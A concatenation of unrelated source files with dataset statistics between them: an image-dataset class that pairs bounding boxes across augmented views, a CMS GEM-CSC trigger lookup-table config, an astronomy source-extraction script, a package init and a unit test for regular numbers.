bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
pad1_13 = self.padding_k - bboxs1_13.shape[0]
if pad1_13 > 0:
pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
pad2 = self.padding_k - bboxs2.shape[0]
if pad2 > 0:
pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
pad3 = self.padding_k - bboxs3.shape[0]
if pad3 > 0:
pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
resized_bboxs1_12 = resized_bboxs1_12.astype(int)
resized_bboxs1_13 = resized_bboxs1_13.astype(int)
resized_bboxs2 = resized_bboxs2.astype(int)
resized_bboxs3 = resized_bboxs3.astype(int)
bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
bboxs1_12 = bboxs_to_tensor(bboxs1_12, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs1_13 = bboxs_to_tensor(bboxs1_13, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs3 = bboxs_to_tensor(bboxs3, params3) # x1y1x2y2 -> x1y1x2y2 (0, 1)
img, bboxs1_12, bboxs1_13, params = self.transform[3](img, bboxs1_12, bboxs1_13, params) # flip
img2, bboxs2, params2 = self.transform[4](img2, bboxs2, params2) # flip
img3, bboxs3, params3 = self.transform[4](img3, bboxs3, params3) # flip
img1 = self.transform[5](img) # color
img2 = self.transform[6](img2) # color
img3 = self.transform[6](img3) # color
img2_cutout = self.transform[7](img2, bboxs2, self.view_size)
img3_cutout = self.transform[7](img3, bboxs3, self.view_size_3)
return img1, img2_cutout, img3_cutout, bboxs1_12, bboxs1_13, bboxs2, bboxs3, aware_corres_12, aware_corres_13, index, target
class ImageFolderImageAsymBboxAwareMulti3ResizeExtraJitter1(DatasetFolderProps):
def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
image_size=0, image3_size=0, image4_size=0, select_strategy='', select_k=0, weight_strategy='',
jitter_prob=0.0, jitter_ratio=0.0,
padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
transform=None, target_transform=None,
loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
super(ImageFolderImageAsymBboxAwareMulti3ResizeExtraJitter1, self).__init__(root, loader, IMG_EXTENSIONS,
ann_file=ann_file, img_prefix=img_prefix,
train_props_file=train_props_file,
select_strategy=select_strategy, select_k=select_k,
transform=transform, target_transform=target_transform,
cache_mode=cache_mode, dataset=dataset)
self.imgs = self.samples
self.props = self.samples_props
self.select_strategy = select_strategy
self.select_k = select_k
self.weight_strategy = weight_strategy
self.jitter_prob = jitter_prob
self.jitter_ratio = jitter_ratio
self.padding_k = padding_k
self.view_size = (image_size, image_size)
self.view_size_3 = (image3_size, image3_size)
self.view_size_4 = (image4_size, image4_size)
assert image3_size > 0
assert image4_size > 0
self.debug = False
self.max_tries = max_tries
self.least_common = max(self.padding_k // 2, 1)
self.aware_range = aware_range
assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
self.aware_start = aware_start # starting from 0 means use p2
self.aware_end = aware_end # end, if use P6 might be 5
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
image_size = image.size
image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
image_proposals_w_id = append_prop_id(image_proposals) # start from 1
assert len(self.transform) == 8
# transform = (transform_whole_img, transform_img, transform_img_small, transform_img_resize, transform_flip_flip, transform_flip, transform_post_1, transform_post_2)
tries = 0
least_common = self.least_common
while tries < self.max_tries:
img, params = self.transform[0](image) # whole image resize
img2, params2 = self.transform[1](image) # random crop resize
img3, params3 = self.transform[2](image) # small random crop resize
params_overlap12 = cal_overlap_params(params, params2)
overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k) # check paras are
params_overlap13 = cal_overlap_params(params, params3)
overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k) # check paras are
# TODO: ensure clipped bboxs width and height are greater than 32
if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common: # ok
break
least_common = max(least_common // 2, 1)
tries += 1
img4 = self.transform[3](img2) # image4 are resized from image 2
jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
pad1_12 = self.padding_k - bboxs1_12.shape[0]
if pad1_12 > 0:
pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
pad1_13 = self.padding_k - bboxs1_13.shape[0]
if pad1_13 > 0:
pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
pad2 = self.padding_k - bboxs2.shape[0]
if pad2 > 0:
pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
pad3 = self.padding_k - bboxs3.shape[0]
if pad3 > 0:
pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
bboxs1_14 = np.copy(bboxs1_12)
bboxs4 = np.copy(bboxs2)
params4 = np.copy(params2)
resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
resized_bboxs1_14 = resize_bboxs(bboxs1_14, params[2], params[3], self.view_size)
resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
resized_bboxs4 = resize_bboxs(bboxs4, params4[2], params4[3], self.view_size_4)
resized_bboxs1_12 = resized_bboxs1_12.astype(int)
resized_bboxs1_13 = resized_bboxs1_13.astype(int)
resized_bboxs1_14 = resized_bboxs1_14.astype(int)
resized_bboxs2 = resized_bboxs2.astype(int)
resized_bboxs3 = resized_bboxs3.astype(int)
resized_bboxs4 = resized_bboxs4.astype(int)
bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs1_14_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_14, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
bboxs4_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs4, self.aware_range, self.aware_start, self.aware_end, -4)
aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
aware_corres_14 = get_aware_correspondence_matrix(bboxs1_14_with_feature_assign, bboxs4_with_feature_assign)
bboxs1_12 = bboxs_to_tensor(bboxs1_12, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs1_13 = bboxs_to_tensor(bboxs1_13, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs1_14 = bboxs_to_tensor(bboxs1_14, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs3 = bboxs_to_tensor(bboxs3, params3) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs4 = bboxs_to_tensor(bboxs4, params4) # x1y1x2y2 -> x1y1x2y2 (0, 1)
img, bboxs1_12, bboxs1_13, bboxs1_14, params = self.transform[4](img, bboxs1_12, bboxs1_13, bboxs1_14, params) # flip
img2, bboxs2, params2 = self.transform[5](img2, bboxs2, params2) # flip
img3, bboxs3, params3 = self.transform[5](img3, bboxs3, params3) # flip
img4, bboxs4, params4 = self.transform[5](img4, bboxs4, params4) # flip
img1 = self.transform[6](img) # color
img2 = self.transform[7](img2) # color
img3 = self.transform[7](img3) # color
img4 = self.transform[7](img4) # color
return img1, img2, img3, img4, bboxs1_12, bboxs1_13, bboxs1_14, bboxs2, bboxs3, bboxs4, aware_corres_12, aware_corres_13, aware_corres_14, index, target
| 49.30965
| 174
| 0.635455
| 5,933
| 46,499
| 4.683128
| 0.063037
| 0.017563
| 0.017132
| 0.011589
| 0.833147
| 0.818643
| 0.804967
| 0.794565
| 0.786791
| 0.770308
| 0
| 0.048803
| 0.268931
| 46,499
| 942
| 175
| 49.361996
| 0.768547
| 0.117572
| 0
| 0.743704
| 0
| 0
| 0.020778
| 0
| 0.005926
| 0
| 0
| 0.004246
| 0.020741
| 1
| 0.041481
| false
| 0
| 0.023704
| 0.002963
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6549bf6aa5becd22a020783eb7a95b2393364ff7
| 8,564
|
py
|
Python
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 13
|
2015-11-30T15:49:45.000Z
|
2022-02-08T16:11:30.000Z
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 640
|
2015-02-11T18:55:47.000Z
|
2022-03-31T14:12:23.000Z
|
L1Trigger/CSCTriggerPrimitives/python/params/gemcscParams.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 51
|
2015-08-11T21:01:40.000Z
|
2022-03-30T07:31:34.000Z
|
import FWCore.ParameterSet.Config as cms
# GEM coincidence pad processors
copadParamGE11 = cms.PSet(
verbosity = cms.uint32(0),
maxDeltaPad = cms.uint32(4),
maxDeltaRoll = cms.uint32(1),
maxDeltaBX = cms.uint32(0)
)
copadParamGE21 = copadParamGE11.clone()
## LUTs for the Run-3 GEM-CSC integrated local trigger
gemcscParams = cms.PSet(
## convert pad number to 1/2-strip in ME1a
padToHsME1aFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1a_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1a_odd.txt",
),
## convert pad number to 1/2-strip in ME1b
padToHsME1bFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1b_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME1b_odd.txt",
),
## convert pad number to 1/2-strip in ME21
padToHsME21Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_hs_ME21_odd.txt",
),
## convert pad number to 1/8-strip in ME1a
padToEsME1aFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1a_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1a_odd.txt",
),
## convert pad number to 1/8-strip in ME1b
padToEsME1bFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1b_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME1b_odd.txt",
),
## convert pad number to 1/8-strip in ME21
padToEsME21Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_pad_es_ME21_odd.txt",
),
## convert eta partition to minimum wiregroup in ME11
rollToMinWgME11Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME11_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME11_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME11_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME11_odd.txt",
),
## convert eta partition to maximum wiregroup in ME11
rollToMaxWgME11Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME11_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME11_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME11_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME11_odd.txt",
),
## convert eta partition to minimum wiregroup in ME21
rollToMinWgME21Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_min_wg_ME21_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_min_wg_ME21_odd.txt",
),
## convert eta partition to maximum wiregroup in ME21
rollToMaxWgME21Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l1_max_wg_ME21_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/CoordinateConversion/GEMCSCLUT_roll_l2_max_wg_ME21_odd.txt",
),
# lookup tables for the GEM-CSC slope correction
gemCscSlopeCorrectionFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_even_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_even_GE11_layer2.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_odd_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCSlopeCorr_ME11_odd_GE11_layer2.txt",
),
# lookup tables for the GEM-CSC slope correction
gemCscSlopeCosiFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_even_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_odd_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_even_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_odd_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_even_GE11_layer2.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_2to1_SlopeShift_ME11_odd_GE11_layer2.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_even_GE11_layer2.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/CSCconsistency_3to1_SlopeShift_ME11_odd_GE11_layer2.txt",
),
# lookup tables for the GEM-CSC slope correction
gemCscSlopeCosiCorrectionFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_even_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_even_GE11_layer2.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_odd_GE11_layer1.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/SlopeCorrection/FacingChambers/GEMCSCconsistentSlopeCorr_ME11_odd_GE11_layer2.txt",
),
# convert differences in 1/8-strip numbers between GEM and CSC to Run-3 slopes
esDiffToSlopeME1aFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1a_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1a_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1a_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1a_odd.txt",
),
esDiffToSlopeME1bFiles = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1b_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME1b_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1b_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME1b_odd.txt",
),
esDiffToSlopeME21Files = cms.vstring(
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L1_ME21_odd.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME21_even.txt",
"L1Trigger/CSCTriggerPrimitives/data/GEMCSC/BendingAngle/GEMCSCLUT_es_diff_slope_L2_ME21_odd.txt",
),
)
gemcscPSets = cms.PSet(
gemcscParams.clone(),
copadParamGE11 = copadParamGE11.clone(),
copadParamGE21 = copadParamGE21.clone(),
)
| 68.512
| 141
| 0.806516
| 933
| 8,564
| 7.085745
| 0.11254
| 0.245651
| 0.279534
| 0.330358
| 0.879292
| 0.877477
| 0.877477
| 0.877477
| 0.868855
| 0.831644
| 0
| 0.042341
| 0.11198
| 8,564
| 124
| 142
| 69.064516
| 0.826956
| 0.086875
| 0
| 0.15534
| 0
| 0
| 0.755133
| 0.755133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009709
| 0
| 0.009709
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
333107e0dcfc20ba5d66fc15b7d9e367c7645b8f
| 841
|
py
|
Python
|
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
sdi_pipeline/extract.py
|
andrewhstewart/SDI
|
19d52bd5e13c2128c083776712672becf8b6ab45
|
[
"MIT"
] | null | null | null |
import sex
import psf
import glob
def EXTRACT():
path = input("-> Enter path to target's exposure time directory: ")
images = glob.glob(path + '/data/*.fits')
psf_data = glob.glob(path + '/psf/*')
if len(psf_data) == 3*len(images):
sex.sextractor(path)
sex.src_filter(path)
else:
sex.sextractor_psf(path)
psf.psfex(path)
sex.sextractor(path)
sex.src_filter(path)
if __name__ == '__main__':
path = input("-> Enter path to target's exposure time directory: ")
images = glob.glob(path + '/data/*.fits')
psf_data = glob.glob(path + '/psf/*')
if len(psf_data) == 3*len(images):
sex.sextractor(path)
sex.src_filter(path)
else:
sex.sextractor_psf(path)
psf.psfex(path)
sex.sextractor(path)
sex.src_filter(path)
| 29
| 71
| 0.601665
| 113
| 841
| 4.318584
| 0.247788
| 0.159836
| 0.098361
| 0.163934
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0.901639
| 0
| 0.003185
| 0.25327
| 841
| 29
| 72
| 29
| 0.773885
| 0
| 0
| 0.814815
| 0
| 0
| 0.173397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3370f54fb3b010ebf8de19bf156d15fd2b07fb1c
| 172
|
py
|
Python
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 29
|
2020-09-03T08:35:47.000Z
|
2022-02-10T18:39:29.000Z
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 6
|
2020-12-22T14:43:14.000Z
|
2022-03-12T00:55:24.000Z
|
library/__init__.py
|
AmirHosseinAmeli/Triple-GAN
|
127948d9e22767d315a4b3ca58fc4a56d92ff9d3
|
[
"MIT"
] | 8
|
2020-10-01T04:03:40.000Z
|
2022-03-21T10:23:40.000Z
|
from . import inputs
from . import data_iters
# from . import model_discriminators
# from . import model_generators
# from . import model_layers
from . import randaugment
| 21.5
| 36
| 0.784884
| 22
| 172
| 5.954545
| 0.454545
| 0.458015
| 0.343511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 172
| 8
| 37
| 21.5
| 0.909722
| 0.534884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
68268083c69beec46b4742a2ad4e6ee152ef7ed1
| 1,620
|
py
|
Python
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | 1
|
2020-06-26T13:28:43.000Z
|
2020-06-26T13:28:43.000Z
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | 7
|
2021-11-18T19:46:08.000Z
|
2022-03-12T01:03:01.000Z
|
py/tests/problems/heap/regular_numbers.py
|
bmoretz/Daily-Coding-Problem
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
[
"MIT"
] | null | null | null |
import unittest
from dcp.problems.heap.regular_numbers import regular_numbers1, regular_numbers2
class Test_RegularNumbers1(unittest.TestCase):
def setUp(self):
self.regulars = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 25,
27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80, 81, 90, 96, 100,
108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192, 200, 216, 225, 240,
243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384, 400, 405, 432, 450, 480,
486, 500, 512, 540, 576, 600, 625, 640, 648, 675, 720, 729, 750, 768, 800, 810,
864, 900, 960, 972, 1000, 1024, 1080, 1125, 1152, 1200, 1215, 1250, 1280, 1296,
1350, 1440, 1458, 1500, 1536]
def test_case1(self):
assert regular_numbers1(10) == self.regulars[:10]
class Test_RegularNumbers2(unittest.TestCase):
def setUp(self):
self.regulars = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 25,
27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80, 81, 90, 96, 100,
108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192, 200, 216, 225, 240,
243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384, 400, 405, 432, 450, 480,
486, 500, 512, 540, 576, 600, 625, 640, 648, 675, 720, 729, 750, 768, 800, 810,
864, 900, 960, 972, 1000, 1024, 1080, 1125, 1152, 1200, 1215, 1250, 1280, 1296,
1350, 1440, 1458, 1500, 1536]
def test_case1(self):
assert list(regular_numbers2(10)) == self.regulars[:10]
| 50.625
| 96
